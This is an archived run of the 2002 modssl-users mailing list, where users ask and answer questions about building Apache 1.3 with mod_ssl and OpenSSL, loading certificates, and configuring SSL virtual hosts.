Thread-Index: AcJKfurS9QMkAd0aSL+q/aI3fXPmAwAAK6Mw
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAB18602
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I don't know if it's just a typo in the mail, but you need "--" before "prefix" in your configure line.

<< 	prefix=/app/apache
>> 	--prefix=/app/apache

Rgds,

Owen Boyle

>-----Original Message-----
>From: erwin.vogeleer@deltalloydLife.be
>[mailto:erwin.vogeleer@deltalloydLife.be]
>Sent: Freitag, 23. August 2002 10:23
>To: modssl-users@modssl.org
>Subject: Installing apache
>
>
>Dear,
>
>While configuring mod_ssl I get:
>
>Configuring mod_ssl/2.8.10 for Apache/1.3.26
> + Apache location: ../apache_1.3.26 (Version 1.3.26)
> + OpenSSL location: ../openssl-0.9.6g
> + MM location: ../mm-1.2.1
> + Auxiliary patch tool: ./etc/patch/patch (local)
>./configure:Error: Building of 'patch' tool failed:
>------------------------------------------------------------
>patch/util.c
>tar: patch/util.c: Cannot open: No such file or directory
>patch/util.h
>tar: patch/util.h: Cannot open: No such file or directory
>patch/version.c
>tar: patch/version.c: Cannot open: No such file or directory
>patch/version.h
>tar: patch/version.h: Cannot open: No such file or directory
>tar: Error exit delayed from previous errors
>make: *** No targets specified and no makefile found.  Stop.
>
>
>
>I use the command:
>
>./configure --with-apache=../apache_1.3.26 --with-ssl=../openssl-0.9.6g
>--with-mm=../mm-1.2.1 prefix=/app/apache --enable-module=so
>
>from the mod_ssl directory (/app/mod_ssl-2.8.10-1.3.26)
>
>The path or file '/etc/patch/patch' doesn't exist on my system.
>I have the c compilor gcc (/usr/bin/gcc). This path is also 
>included in the
>$PATH variable.
>
>Thus anyone have an idea of wath this can be?
>
>
>Thx
>
>
>Erwin
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 13:13:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA22081; Fri, 23 Aug 2002 13:12:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id NAA22077; Fri, 23 Aug 2002 13:11:32 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g7NBBSa29585
	for ; Fri, 23 Aug 2002 13:11:28 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Fri Aug 23 13:11:27 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 23 Aug 2002 13:11:27 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 23 Aug 2002 13:11:27 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 23 Aug 2002 13:11:26 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Subject: simple question - I hope
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Fri, 23 Aug 2002 13:11:26 +0200
Message-ID: 
Thread-Topic: simple question - I hope
Thread-Index: AcJKldJyF0gAJvDmT2iJbEbxmt/sBQ==
X-Priority: 1
Importance: high
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 23 Aug 2002 11:11:26.0359 (UTC) FILETIME=[D2988A70:01C24A95]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA22078
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all

I'm new to mod-ssl and all so pls bear with me.

I'm trying to config mod_ssl inside apache's httpd.conf to just do
basic authentication i.e. I don't want it to request the client for a
certficate. How does one do that exactly?

My basic authentication module is mod_authz_ldap which connects to an
openldap database.

I tried setting the "SSLVerifyClient" to none but the client browser
still gives a warning and doesn't show the basic authentication login
dialog.

Thanks in advance
Jose Correia
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 19:19:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA00236; Fri, 23 Aug 2002 19:18:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from schnarff.com id TAA00225; Fri, 23 Aug 2002 19:17:37 +0200 (MET DST)
Received: (qmail 16781 invoked by uid 1000); 23 Aug 2002 17:17:47 -0000
Message-ID: <20020823171747.12595.qmail@schnarff.com>
From: "Alex Kirk" 
To: modssl-users@modssl.org
Subject: MODULE_MAGIC_COOKIE_EAPI
Date: Fri, 23 Aug 2002 17:17:47 GMT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Kirk" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just downloaded the latest mod_ssl (for Apache 1.3.26) and was following 
the directions in INSTALL to get it up and running. After upgrading OpenSSL 
to 0.9.6g, I configured up mod_ssl, and then went over to my Apache 
directory and configured it with the following: 

./configure \
 --with-layout=Apache \
 --prefix=/usr/local/apache \
 --enable-module=so \
 --activate-module=src/modules/perl/libperl.a \
 --activate-module=src/modules/php4/libphp4.a \
 --activate-module=src/modules/ssl/libssl.module 

Configure ran fine, but when I ran "make", I got a nasty error:gcc -c  
 -I../os/unix -I../include -I/home/packages/openssl-0.9.6g/include   
 -DTARGET=\"httpsd\" -DMOD_PERL -I/home/packages/php-4.2.1 
 -I/home/packages/php-4.2.1/main -I/home/packages/php-4.2.1/main 
 -I/home/packages/php-4.2.1/Zend -I/home/packages/php-4.2.1/Zend 
 -I/home/packages/php-4.2.1/TSRM -I/home/packages/php-4.2.1/TSRM 
 -I/home/packages/php-4.2.1 -DMOD_SSL=208110 -DEAPI -DUSE_EXPAT 
 -I../lib/expat-lite -I/home/packages/openssl-0.9.6g/include `../apaci` 
 -I/home/packages/openssl-0.9.6g/include http_config.c
http_config.c: In function `ap_add_module':
http_config.c:631: `MODULE_MAGIC_COOKIE_EAPI' undeclared (first use in this 
function)
http_config.c:631: (Each undeclared identifier is reported only once
http_config.c:631: for each function it appears in.)
http_config.c:632: structure has no member named `add_module'
http_config.c:633: structure has no member named `add_module'
http_config.c: In function `ap_remove_module':
http_config.c:659: `MODULE_MAGIC_COOKIE_EAPI' undeclared (first use in this 
function)
http_config.c:660: structure has no member named `remove_module'
http_config.c:661: structure has no member named `remove_module'
http_config.c: In function `ap_handle_command':
http_config.c:1068: `MODULE_MAGIC_COOKIE_EAPI' undeclared (first use in this 
function)
http_config.c:1069: structure has no member named `rewrite_command'
http_config.c:1070: structure has no member named `rewrite_command'
*** Error code 1 

Stop in /home/packages/apache_1.3.26/src/main.
*** Error code 1 

Stop in /home/packages/apache_1.3.26/src (line 192 of Makefile).
*** Error code 1 

Stop in /home/packages/apache_1.3.26 (line 202 of ./Makefile).
*** Error code 1 

Stop in /home/packages/apache_1.3.26 (line 184 of Makefile). 

I can't figure out what the heck MODULE_MAGIC_COOKIE_EAPI is, since a) I 
didn't install anything along those lines that I know of, b) the FAQ says 
nothing about such a thing, and c) I saw nothing on these archives. 

Any thoughts on this? 

Alex Kirk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 22:53:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA05584; Fri, 23 Aug 2002 22:52:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ndic.com id WAA05579; Fri, 23 Aug 2002 22:52:06 +0200 (MET DST)
Received: from POSEIDON [206.72.72.234] by ndic.com with ESMTP
  (SMTPD32-7.10) id A106DFE0028; Fri, 23 Aug 2002 13:54:30 -0700
From: "Masen Yaffee" 
To: 
Subject: Problem loading crt
Date: Fri, 23 Aug 2002 13:52:07 -0700
Message-ID: <005201c24ae6$f1da6330$ea01a8c0@ndic.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id WAA05580
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Masen Yaffee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

I'm trying to get a temporary .crt from Thawte because our primary .crt
just expired (long story – problems with Thawte believing we are who we
say we are). I'm using openssl 0.9.6c to generate a server key which I
paste into Thawte's "Get a test Certificate" interface.

Here's how I created the .key:

/usr/local/ssl/bin/openssl genrsa -des3 -out regform.key 1024

and entered all the onscreen info appropriately (I've done this several
times in the past with success, so I'm pretty sure I'm answering the
questions right). I can read the key file back in with no problem using:

/usr/local/ssl/bin/openssl rsa -noout -text -in regform.key

Then I generate a CSR like this:

openssl req -new -key regform.key -out regform.csr

I copied the contents of the csr exactly (no extra spaces, etc.) and
pasted it into Thawte's interface. I tried all three formats that they
offer: default (they auto select the best format bsed on the format of
the csr), "standard" format (lowest-common-denominator format is a
BASE64 encoding of an X509 certificate) and "PEM" format. They
immediately give back a certificate which I copy back to it's own text
file, "regform.crt". If I try to read the crt with:

/usr/local/openssl/bin/openssl x509 -noout -text -in regform.crt

I get the following error:

unable to load certificate
19300:error:0906D06C:PEM routines:PEM_read_bio:no start
line:pem_lib.c:662:Expecting: TRUSTED CERTIFICATE

If I try to load the key/crt combo in apache, I get this error:

[Fri Aug 23 12:03:05 2002] [error] mod_ssl: Init: Unable to read server
certificate from file /home/regform/cert/regform.crt (OpenSSL library
error follows)
[Fri Aug 23 12:03:05 2002] [error] OpenSSL: error:0D09F007:asn1 encoding
routines:d2i_X509:expecting an asn1 sequence

There are 5 other key/crts running on this server under different
virtual hosts, so I know that everything is installed right. I found
some references to this error in the mailing list archives, but couldn't
figure out the cause or how to fix. Any help is greatly appreciated!!!

Thanks,
Masen

--
Masen Yaffee
New Directions In Computing
"The Tri-County's First Website Development Company"
805-962-8565 x28      http://www.ndic.com/
Since 1994


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 24 10:03:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA17412; Sat, 24 Aug 2002 10:02:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pikababy.gropep.com.au id KAA17406; Sat, 24 Aug 2002 10:01:44 +0200 (MET DST)
Received: from gropep.com.au (dhcp-69.gropep.com.au [150.101.50.69])
	by pikababy.gropep.com.au (8.11.6/8.11.6) with ESMTP id g7O84tZ36890
	for ; Sat, 24 Aug 2002 17:34:55 +0930 (CST)
	(envelope-from danielm@gropep.com.au)
Message-ID: <3D673D6A.5EF65091@gropep.com.au>
Date: Sat, 24 Aug 2002 17:31:46 +0930
From: danielm 
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: problems with mod_ssl install...
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: danielm 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi listmembers,

I am needing some help to get mod ssl up and running, if you'd be so
kind...

My system is freebsd, and I've been going from the INSTALL file included
with mod_ssl(2.8.8). Everything installed fine, I edited httpd.conf and
added Listen 443. I start apache with the startssl option, I enter the
password... everything looks good... I can connect to the computer on
port 80, but when I try port 443 I get "The page cannot be displayed"
error in ie and a time out in Netscape and Lynx. 

Am I making a typical newbie mistake? Can anyone help me out?
Any clues *much* appreciated!
Thanks,
Daniel.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 24 11:02:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA18457; Sat, 24 Aug 2002 11:01:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id LAA18448; Sat, 24 Aug 2002 11:00:56 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H1CBP000.R1K for ; Sat, 24 Aug 2002
          10:00:36 +0100 
Message-ID: <3D674B32.70101@itaction.co.uk>
Date: Sat, 24 Aug 2002 10:00:34 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: problems with mod_ssl install...
References: <3D673D6A.5EF65091@gropep.com.au>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

you need to do a bit more than just adding Listen 443 to the conf file.

there is an example conf file in '{apachesourcedir}/conf/http.conf-dist' 
that  should help you with what to add.

danielm wrote:

>Hi listmembers,
>
>I am needing some help to get mod ssl up and running, if you'd be so
>kind...
>
>My system is freebsd, and I've been going from the INSTALL file included
>with mod_ssl(2.8.8). Everything installed fine, I edited httpd.conf and
>added Listen 443. I start apache with the startssl option, I enter the
>password... everything looks good... I can connect to the computer on
>port 80, but when I try port 443 I get "The page cannot be displayed"
>error in ie and a time out in Netscape and Lynx. 
>
>Am I making a typical newbie mistake? Can anyone help me out?
>Any clues *much* appreciated!
>Thanks,
>Daniel.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 24 15:56:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA23249; Sat, 24 Aug 2002 15:55:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from usmailrelay.beasys.com id PAA23245; Sat, 24 Aug 2002 15:54:47 +0200 (MET DST)
Received: from boulder.beasys.com (boulder.bea.com [10.36.32.10])
	by usmailrelay.beasys.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id g7ODsi512950
	for ; Sat, 24 Aug 2002 06:54:45 -0700 (PDT)
Received: from andrews ([192.168.11.48])
	by boulder.beasys.com (8.9.3+Sun/8.9.1) with SMTP id HAA20021
	for ; Sat, 24 Aug 2002 07:54:43 -0600 (MDT)
From: "Andrew Scrivner" 
To: 
Subject: RE: problems with mod_ssl install...
Date: Sat, 24 Aug 2002 07:54:00 -0600
Message-ID: <000701c24b75$b3848ae0$0b012a0a@beasys.com>
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
In-Reply-To: <3D673D6A.5EF65091@gropep.com.au>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Scrivner" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


	My only advice is to make sure that you are running
$APACHEROOT/bin/apachectl startssl to start your SSL aware server, make sure
	that you have listening a correctly defined SSL PORT ( YOu declare the SSL
listen
	port TWICE in the httpd.conf, once in an  block, once in  the
	this area:
##
## SSL Virtual Host Context
##
#

            <------- Make sure this is the same as
above...

#  General setup for the virtual host
DocumentRoot "/opt/apache_1.3.12_ssl/htdocs"

The make sure to test the port with something better than a web browser:
/usr/local/ssl/bin/openssl s_client connect $HOSTNAME:$SSLPORTNUM -state -debug,

with will show whether ot nor SSL is listening on yout port, lastly make sure
when
the browser hits the port that you are hitting the port like: https://whaterver

Good Luck
andrew
r
-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of danielm
Sent: Saturday, August 24, 2002 2:02 AM
To: modssl-users@modssl.org
Subject: problems with mod_ssl install...


Hi listmembers,

I am needing some help to get mod ssl up and running, if you'd be so
kind...

My system is freebsd, and I've been going from the INSTALL file included
with mod_ssl(2.8.8). Everything installed fine, I edited httpd.conf and
added Listen 443. I start apache with the startssl option, I enter the
password... everything looks good... I can connect to the computer on
port 80, but when I try port 443 I get "The page cannot be displayed"
error in ie and a time out in Netscape and Lynx.

Am I making a typical newbie mistake? Can anyone help me out?
Any clues *much* appreciated!
Thanks,
Daniel.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 26 03:53:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA27921; Mon, 26 Aug 2002 03:52:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pikababy.gropep.com.au id DAA27917; Mon, 26 Aug 2002 03:51:36 +0200 (MET DST)
Received: from gropep.com.au (dhcp-69.gropep.com.au [150.101.50.69])
	by pikababy.gropep.com.au (8.11.6/8.11.6) with ESMTP id g7Q1oEP03872
	for ; Mon, 26 Aug 2002 11:20:14 +0930 (CST)
	(envelope-from danielm@gropep.com.au)
Message-ID: <3D6989A4.379AC72@gropep.com.au>
Date: Mon, 26 Aug 2002 11:21:32 +0930
From: danielm 
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: problems with mod_ssl install...
References: <3D673D6A.5EF65091@gropep.com.au> <3D674B32.70101@itaction.co.uk>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: danielm 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yeah, I forgot to mention that the virtual host was set up... when I ran
it using ./httpd -DSSL it all worked. I found an ambiguous mail in the
archives that seemed to suggest it. The setup guide doesn't tell you how
to start apache, and the apache config tells you the wrong way: 
"...when you want to run it with SSL enabled use: /apache/bin/apachectl
startssl", so it's confusing to say the least.

Now I have a new problem. When I add my other virtual domains back into
the conf file they don't work. They are IP based virtual domains. When I
start it using "apachectl start" they do work, but of course SSL is not
enabled. Have you got any hints as to what I could check for to get
everything going together?

Thanks, a lot!
Daniel.


Peter Viertel wrote:
> 
> you need to do a bit more than just adding Listen 443 to the conf file.
> 
> there is an example conf file in '{apachesourcedir}/conf/http.conf-dist'
> that  should help you with what to add.
> 
> danielm wrote:
> 
> >Hi listmembers,
> >
> >I am needing some help to get mod ssl up and running, if you'd be so
> >kind...
> >
> >My system is freebsd, and I've been going from the INSTALL file included
> >with mod_ssl(2.8.8). Everything installed fine, I edited httpd.conf and
> >added Listen 443. I start apache with the startssl option, I enter the
> >password... everything looks good... I can connect to the computer on
> >port 80, but when I try port 443 I get "The page cannot be displayed"
> >error in ie and a time out in Netscape and Lynx.
> >
> >Am I making a typical newbie mistake? Can anyone help me out?
> >Any clues *much* appreciated!
> >Thanks,
> >Daniel.
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 26 07:54:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA02593; Mon, 26 Aug 2002 07:53:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from srrdc013dmz03.rdc.nl id HAA02586; Mon, 26 Aug 2002 07:52:33 +0200 (MET DST)
Received: from srrdc006srv02.services.rdc.net (srrdc006srv02.services.rdc.net [217.115.224.166])
	by srrdc013dmz03.rdc.nl (8.9.3+Sun/8.9.3) with ESMTP id HAA29443
	for ; Mon, 26 Aug 2002 07:52:24 +0200 (MET DST)
Received: from rdc.nl (pcrs.rdcka.rdc.net [172.31.1.24])
	by srrdc006srv02.services.rdc.net (8.9.3+Sun/8.9.3) with ESMTP id HAA00693
	for ; Mon, 26 Aug 2002 07:51:40 +0200 (MET DST)
Message-ID: <3D69C222.1040805@rdc.nl>
Date: Mon, 26 Aug 2002 07:52:34 +0200
From: Danny Kruitbosch 
Organization: RDC Datacentrum BV
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Custom error pages
X-Enigmail-Version: 0.62.4.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Danny Kruitbosch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I've been testing with modssl and ran into the folowwing problem:

When a user connects with a wrong client cert (revoked or not from the 
right CA etc) than the user gets a "page cannot be displayed message" in 
his (IE) browser.
In the ssl logs I get a nice message saying something like "client cert 
revoked, not valid or whatever" so the system is working properly.

What I would like to do is to redirect the user to a custom error page 
when something like this happens. How can I do that?

Thanks,

Danny Kruitbosch

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 26 08:04:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA02845; Mon, 26 Aug 2002 08:03:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from srrdc013dmz03.rdc.nl id IAA02839; Mon, 26 Aug 2002 08:02:33 +0200 (MET DST)
Received: from srrdc006srv02.services.rdc.net (srrdc006srv02.services.rdc.net [217.115.224.166])
	by srrdc013dmz03.rdc.nl (8.9.3+Sun/8.9.3) with ESMTP id IAA29974
	for ; Mon, 26 Aug 2002 08:02:24 +0200 (MET DST)
Received: from rdc.nl (pcrs.rdcka.rdc.net [172.31.1.24])
	by srrdc006srv02.services.rdc.net (8.9.3+Sun/8.9.3) with ESMTP id IAA08337
	for ; Mon, 26 Aug 2002 08:01:41 +0200 (MET DST)
Message-ID: <3D69C47A.6030300@rdc.nl>
Date: Mon, 26 Aug 2002 08:02:34 +0200
From: Danny Kruitbosch 
Organization: RDC Datacentrum BV
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users 
Subject: Performance tuning modssl/reverse proxy
X-Enigmail-Version: 0.62.4.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Danny Kruitbosch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Can anyone give me some pointers on how to tune the performance of 
modssl in the folowing situation:

apache/modssl as a ssl reverse proxy   (browser ---> (https) ---> ssl 
reverse proxy ---> (http) ---> webserver/webappl.)
All will be running on Linux/Intel

I would like to know the following:

- which ssl accelerator cards are supported (by openssl/modssl) best in 
this setup
- are there any guidelines for calculating the amount of memory/cpu 
power etc
- what compile/config steps can we take to tune the system
- any prefered  Linux distro (Mandrake, RedHat, SuSe; we don't do any 
debian or slackware)
- Is Apache 2.0 a better option than 1.3.x
- Does anyone have some benchmark info on a system like this (we need to 
support about 2300 concurrent SSL sessions at any given moment)

Thanks,

Danny Kruitbosch

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 26 14:12:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA12551; Mon, 26 Aug 2002 14:11:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA12547; Mon, 26 Aug 2002 14:10:37 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 072744CE693; Mon, 26 Aug 2002 14:10:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 728E728683; Mon, 26 Aug 2002 09:19:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mailcity.com id IAA03694; Mon, 26 Aug 2002 08:45:28 +0200 (MET DST)
Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon, 26 Aug 2002 06:45:19 -0000
To: modssl-users@modssl.org
Date: Mon, 26 Aug 2002 11:45:19 +0500
From: "Siddique Shahzad" 
Message-ID: 
Mime-Version: 1.0
X-Sent-Mail: off
X-Expiredinmiddle: true
X-Mailer: MailCity Service
X-Priority: 3
Subject: Help Required!
X-Sender-Ip: 202.179.140.24
Organization: Lycos Mail  (http://www.mail.lycos.com:80)
Content-Type: text/plain; charset=us-ascii
Content-Language: en
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Siddique Shahzad" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Respected Sir,

MY Problem:
I have to implement Apache+SSL to for the security of my web application, but i have only Password field and Billing amount field to store into the database.... i want to use SSL for encryption of the said fields...
so keep me sure that which Cipher i can use that will encrypt the data over the wire through SSL and then decrypt it before storing..

And furhter.. is there any need of Certificates...where i want to authenticate my users only matching there password into the database...
so is this better for me to use only any Cipher?

and if u feel free then plz give me step by step solution to my problem...that how can i configure mod_ssl + openssl for my problem..

Regards

SHAZ!


__________________________________________________________
Outgrown your current e-mail service? Get a 25MB Inbox, POP3 Access,
No Ads and No Taglines with LYCOS MAIL PLUS.
http://login.mail.lycos.com/brandPage.shtml?pageId=plus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 08:52:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA08697; Tue, 27 Aug 2002 08:51:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rdsl_mlb_mx1.requestdsl.com.au id IAA08690; Tue, 27 Aug 2002 08:50:40 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
